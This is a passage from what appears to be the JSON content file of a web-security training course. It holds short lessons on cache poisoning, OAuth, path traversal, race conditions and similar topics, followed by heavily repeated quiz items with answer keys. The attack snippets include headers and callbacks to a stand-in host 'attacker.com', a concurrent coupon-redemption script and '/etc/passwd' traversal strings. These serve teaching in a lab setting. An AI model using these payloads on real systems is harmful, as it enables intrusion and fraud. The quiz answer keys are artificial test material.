clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"cache-poison","cat":"Web Application","title":"Web Cache Poisoning","diff":3,"xp":250,"intro":"Poison cached responses.","sections":[{"type":"text","content":"Poison cached responses."},{"type":"code","lang":"http","content":"GET /page HTTP/1.1\nX-Forwarded-Host: attacker.com"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Why dangerous?","opts":["Fast","Malicious response to ALL cached users","HTTPS bypass","Admin required"],"ans":1},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"graphql","cat":"Web Application","title":"GraphQL Attacks","diff":2,"xp":150,"intro":"Introspection and injection.","sections":[{"type":"text","content":"Introspection and injection."},{"type":"code","lang":"bash","content":"curl -X POST target/graphql -d '{\"query\":\"{__schema{types{name}}}\"}'"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Schema revelation?","opts":["Subscriptions","Introspection","Mutations","Fragments"],"ans":1},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"What header prevents clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"oauth-vuln","cat":"Web Application","title":"OAuth Vulnerabilities","diff":2,"xp":175,"intro":"Exploit OAuth misconfigs.","sections":[{"type":"text","content":"Exploit OAuth misconfigs."},{"type":"code","lang":"http","content":"redirect_uri=https://attacker.com/callback\n# Missing state = CSRF"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"CSRF prevention param?","opts":["scope","state","nonce","redirect_uri"],"ans":1},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"api-bypass","cat":"Web Application","title":"API Auth Bypass","diff":2,"xp":150,"intro":"Bypass API authentication.","sections":[{"type":"text","content":"Bypass API authentication."},{"type":"code","lang":"bash","content":"curl https://target/api/v1/admin # old version, no auth"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Common bypass?","opts":["Strong passwords","Old API versions without auth","HTTPS","Rate limit"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"race-cond","cat":"Web Application","title":"Race Conditions","diff":3,"xp":200,"intro":"TOCTOU exploitation.","sections":[{"type":"text","content":"TOCTOU exploitation."},{"type":"code","lang":"python","content":"import threading,requests\ndef f(): requests.post('https://target/redeem',data={'code':'50OFF'})\n[threading.Thread(target=f).start() for _ in range(100)]"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Race condition type?","opts":["Input","TOCTOU","Memory","Logic"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"passwd-reset","cat":"Web Application","title":"Password Reset Flaws","diff":1,"xp":100,"intro":"Weak reset implementations.","sections":[{"type":"text","content":"Weak reset implementations."},{"type":"code","lang":"http","content":"POST /forgot HTTP/1.1\nHost: attacker.com\n# Reset link sent to attacker"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Common reset vuln?","opts":["Strong pw","Predictable/leaked tokens","Rate limit","CAPTCHA"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"path-trav","cat":"Web Application","title":"Path Traversal","diff":1,"xp":100,"intro":"Access outside intended dir.","sections":[{"type":"text","content":"Access outside intended dir."},{"type":"code","lang":"bash","content":"?file=../../../etc/passwd\n?file=..%2f..%2f..%2fetc%2fpasswd"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Up-one-dir sequence?","opts":["./","../","~/","\\\\"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"subdom-take","cat":"Web Application","title":"Subdomain Takeover","diff":2,"xp":150,"intro":"Claim abandoned subdomains.","sections":[{"type":"text","content":"Claim abandoned subdomains."},{"type":"code","lang":"bash","content":"dig CNAME old.example.com\nsubjack -w subs.txt"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Takeover DNS record?","opts":["A","CNAME","MX","TXT"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API 